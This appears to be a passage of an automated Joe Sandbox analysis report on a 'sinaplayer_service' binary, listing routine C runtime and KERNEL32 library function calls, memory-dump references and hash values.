                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28318D31301614EFDB15DF59CD80DAABBF5EF89315B10895DE95A8BA00DB34F901CBA2
                                                                                                                                                                                                    Function 6C5BAD3B Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(?,?,00000000,00000070,?,?,6C5A1E37,00000000,?,00000000,?,?,-00000004,6C5C2C37,?,?), ref: 6C5BADB1
                                                                                                                                                                                                    • InterlockedPushEntrySList.KERNEL32(?,?,?,6C5A1E37,00000000,?,00000000,?,?,-00000004,6C5C2C37,?,?,-00000004,?,6C5BDEB3), ref: 6C5BADC6
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(?,?,6C5A1E37,00000000,?,00000000,?,?,-00000004,6C5C2C37,?,?,-00000004,?,6C5BDEB3,-00000004), ref: 6C5BADCD
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,6C5A1E37,00000000,?,00000000,?,?,-00000004,6C5C2C37,?,?,-00000004,?,6C5BDEB3,-00000004), ref: 6C5BADFC
                                                                                                                                                                                                    • Concurrency::details::SafePointInvocation::InvokeAtNextSafePoint.LIBCMT ref: 6C5BAE11
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: List$DepthInterlockedPointQuerySafe$Concurrency::details::EntryFlushInvocation::InvokeNextPush
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1206056122-0
                                                                                                                                                                                                    • Opcode ID: 6cf8b10fcaad7ee827be1548afc367d2433ea68a2f204358c19d68498c2451ed
                                                                                                                                                                                                    • Instruction ID: 09bb960364c30a50a92264094775031028e836afcecd75ff372671cfa120485e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cf8b10fcaad7ee827be1548afc367d2433ea68a2f204358c19d68498c2451ed
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28317C31201610EFCB19DF1ACDA0CAAB7F5EF8A315710895DE95A9BA11DB30F941CBA0
                                                                                                                                                                                                    Function 6C580D63 Relevance: 9.1, APIs: 6, Instructions: 93COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,6C580D31,?,?,?,?,00000000), ref: 6C5A40FA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,6C580D31,?,?,?,?,00000000), ref: 6C5A4104
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,6C580D31,?,?,?,?,00000000), ref: 6C5A4110
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,6C580D31,?,?,?,?,00000000), ref: 6C5A411A
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,6C580D31,?,?,?,?,00000000), ref: 6C5A4142
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,6C580D31,?,?,?,?,00000000), ref: 6C5A4149
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2819658684-0
                                                                                                                                                                                                    • Opcode ID: c2757aba9618cebd934d0aa37c1abdb19a80ef9c5ce30a57f709cfeef8e815d8
                                                                                                                                                                                                    • Instruction ID: 41bd778a85ccca22c12221fad6b7a4c7aa88291a36da9da93e946e14debd03aa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2757aba9618cebd934d0aa37c1abdb19a80ef9c5ce30a57f709cfeef8e815d8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC31F23424B296CBD7028FAECC9178F7BA1AFA6354F144416E8108BF51DB70D853CBA1
                                                                                                                                                                                                    Function 6C562EB8 Relevance: 9.1, APIs: 6, Instructions: 93COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2959964966-0
                                                                                                                                                                                                    • Opcode ID: 5e11eba46e6ddeb57dcd9311bf8b200ca86bbb9609fbf9110a0d3a375050a6f6
                                                                                                                                                                                                    • Instruction ID: 1125fb5a676c3514233e68f6f474140a5f8ce44b665957d6f180182fc25985ab
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e11eba46e6ddeb57dcd9311bf8b200ca86bbb9609fbf9110a0d3a375050a6f6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F219531215306DADB01DEAECC45AAFB764AF45718F200629E824CBEA0DB30C856C7D1
                                                                                                                                                                                                    Function 6C562862 Relevance: 9.1, APIs: 6, Instructions: 90COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2819658684-0
                                                                                                                                                                                                    • Opcode ID: 21118100cbbe5d861a037cf4a075a8dc3dfc8e7837ca19d7b0035dacd5064d74
                                                                                                                                                                                                    • Instruction ID: 4295a1ceb36e3452e6c3817e2588ff130c72c90ba92841958f21eb2579230ef6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21118100cbbe5d861a037cf4a075a8dc3dfc8e7837ca19d7b0035dacd5064d74
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB213631606711DBD711CEAE8C4079E77A49F81758F21095AEC249BFA4D770CC8687E2
                                                                                                                                                                                                    Function 6C5CAE9C Relevance: 9.1, APIs: 6, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6C5CAEA3
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000100,00000004,6C5BA14B,?,00000001,?,00000004,6C5C931D,?,?,6C5B923C,?,?,6C5C9215,?,?), ref: 6C5CAECB
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000100,00000004,6C5BA14B,?,00000001,?,00000004,6C5C931D,?,?,6C5B923C,?,?,6C5C9215,?,?), ref: 6C5CAEDA
                                                                                                                                                                                                    • memset.MSVCR120(6C5B9323,00000000,00000100,00000004,6C5BA14B,?,00000001,?,00000004,6C5C931D,?,?,6C5B923C,?,?,6C5C9215), ref: 6C5CAF06
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000100,6C5B9323,00000000,00000100,00000004,6C5BA14B,?,00000001,?,00000004,6C5C931D,?,?,6C5B923C,?), ref: 6C5CAF30
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000200,00000100,6C5B9323,00000000,00000100,00000004,6C5BA14B,?,00000001,?,00000004,6C5C931D,?,?,6C5B923C,?), ref: 6C5CAF3D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog3memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 747782440-0
                                                                                                                                                                                                    • Opcode ID: 506daf8698ed2e1cb0c7c199b692d10fcc6b05c6193b9a0640ca268fc81bd603
                                                                                                                                                                                                    • Instruction ID: 048d0c3f27c0e97ec0613a0b1db204864bda3e14ed8e4d3ef2a5c6766ee473fa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 506daf8698ed2e1cb0c7c199b692d10fcc6b05c6193b9a0640ca268fc81bd603
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00311CB0A51B408FD7A1CF79C844766BAE0FF45718F10886EC08ACAE90EBB5E545CF51
                                                                                                                                                                                                    Function 6C5F6C47 Relevance: 9.1, APIs: 6, Instructions: 55COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5F6C52
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5F6C8E
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5F6C5D
                                                                                                                                                                                                      • Part of subcall function 6C5F4670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6C5CB412,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C5F4677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5F6C6E
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5F6C79
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5F6C99
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328987296-0
                                                                                                                                                                                                    • Opcode ID: ca88ceccdffc9caa72e73060ede8f03a13cc4685b6424443d30ec5113135439a
                                                                                                                                                                                                    • Instruction ID: 69ca60af8bdb5adc29b437d0f08c1ae1dc0ad1577425aec92fc89430d3fa6dc3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca88ceccdffc9caa72e73060ede8f03a13cc4685b6424443d30ec5113135439a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E701C430504314DFDF1A5F66DE6029B3764EFA5398B100421E8B4D6E10DF719812CFA2
                                                                                                                                                                                                    Function 6C580E8C Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C570BAA
                                                                                                                                                                                                    • wcslen.MSVCR120(00000000,00000000,00000001,?,6C5CC767,0000002F,00000000), ref: 6C580E9E
                                                                                                                                                                                                    • calloc.MSVCR120(00000001,00000002,00000000,00000000,00000001,?,6C5CC767,0000002F,00000000), ref: 6C580EA9
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(00000000,00000001,00000000,00000000), ref: 6C580EBC
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6C5A6370
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5A639B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo_invoke_watsoncallocwcscpy_swcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2591421054-0
                                                                                                                                                                                                    • Opcode ID: 6a229dd47c25f3bbf22d3a6641da4b2aee1296c9d90f34ce879cb8083004f879
                                                                                                                                                                                                    • Instruction ID: 82d2301164ef25ac7e80bf513b133e5463a182909715a356cd8c1a6956b7b5d2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a229dd47c25f3bbf22d3a6641da4b2aee1296c9d90f34ce879cb8083004f879
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6F0F435246245AAEB1049AA9C44AAF32989BC170CF004837F90CDAF10EB768A4A86A0
                                                                                                                                                                                                    Function 6C564F4C Relevance: 9.0, APIs: 6, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __freebuf.LIBCMT ref: 6C564F6E
                                                                                                                                                                                                      • Part of subcall function 6C564E60: free.MSVCR120(?,?,?,6C564F73,?,?), ref: 6C564E76
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?), ref: 6C564F74
                                                                                                                                                                                                    • _close.MSVCR120(00000000,?,?,?), ref: 6C564F7A
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5A53EC
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5A53F7
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6C5A540E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$__freebuf_close_errno_fileno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1586031509-0
                                                                                                                                                                                                    • Opcode ID: 420fb923944ec85eb9e92021de29aa89de89cb2ed8c06761b6a58aecfb4c2e10
                                                                                                                                                                                                    • Instruction ID: f2e9fa543c0cee7252f2718b8f47197ce697560c7ed8e31e852b097cee368a16
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 420fb923944ec85eb9e92021de29aa89de89cb2ed8c06761b6a58aecfb4c2e10
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73F02232906B049ED7219A7B8C00B9FB6984FD233DF244B15D93452FE0EB78D80A4BA1
                                                                                                                                                                                                    Function 6C576F29 Relevance: 9.0, APIs: 6, Instructions: 42memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6C5758DA: __EH_prolog3.LIBCMT ref: 6C5758E1
                                                                                                                                                                                                      • Part of subcall function 6C576F10: TlsAlloc.KERNEL32 ref: 6C576F16
                                                                                                                                                                                                    • TlsAlloc.KERNEL32(6C5648CA), ref: 6C576F52
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6C5A2F79
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C5A2F90
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6C62CF40,6C62CF40,00000000), ref: 6C5A2F9F
                                                                                                                                                                                                    • TlsFree.KERNEL32(6C62CF40,6C62CF40,00000000), ref: 6C5A2FAB
                                                                                                                                                                                                    • TlsFree.KERNEL32(?,6C5CA5DB,?,?), ref: 6C5A2FBE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocFree$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionH_prolog3LastThrow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 46841429-0
                                                                                                                                                                                                    • Opcode ID: 6dc7d61512c10fb8796cecbda09ba9a5e0bc845b9408f474ccea9d1deb2fb36f
                                                                                                                                                                                                    • Instruction ID: effd17661276ee9f0e4601f05867db2d8a5b4495eb0d910fc29a85d022539247
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6dc7d61512c10fb8796cecbda09ba9a5e0bc845b9408f474ccea9d1deb2fb36f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC018871350211DFCB206B77CC8966976F4BB42726F501B25F46AC6990EB388418DB99
                                                                                                                                                                                                    Function 0038E270 Relevance: 9.0, APIs: 6, Instructions: 40COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • UnregisterWaitEx.KERNEL32(?,000000FF,00000000,00000063,0038E8EE,00000001), ref: 0038E284
                                                                                                                                                                                                    • UnregisterWaitEx.KERNEL32(?,000000FF,00000000,00000063,0038E8EE,00000001), ref: 0038E297
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,00000063,0038E8EE,00000001), ref: 0038E2AE
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,00000063,0038E8EE,00000001), ref: 0038E2B8
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,00000063,0038E8EE,00000001), ref: 0038E2C2
                                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCR120(?,00000000,00000063,0038E8EE,00000001), ref: 0038E2C7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandle$UnregisterWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1214919099-0
                                                                                                                                                                                                    • Opcode ID: 2c414d20dd732b80773ae1e6fcafa1ae1e4f47297900a1395b5bea4c934ec018
                                                                                                                                                                                                    • Instruction ID: 145a67c9842cd9eee5b23ce71bb582a77a48e3c41603b58dc4c5dafdd7f2407a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c414d20dd732b80773ae1e6fcafa1ae1e4f47297900a1395b5bea4c934ec018
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28F0F9706007119BDA21BF3AED44F07B3ECAF94720B160F5AE855D3AE0DB75F8018A60
                                                                                                                                                                                                    Function 6C578AFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 131COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,00000001,00000000), ref: 6C578B1D
                                                                                                                                                                                                    • ___crtGetStringTypeA.LIBCMT ref: 6C578B71
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,FE90005A,00000100,00000020,00000100,?,00000100,5EFC4D8B,00000000,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 6C578B92
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,FE90005A,00000200,00000020,00000100,?,00000100,5EFC4D8B,00000000), ref: 6C578BBA
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String$__crt$InfoType___crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3423027535-3916222277
                                                                                                                                                                                                    • Opcode ID: e566df18b961f91470cee0b25dab0b6095d2365e9b31ee8397a7f1f73698cb47
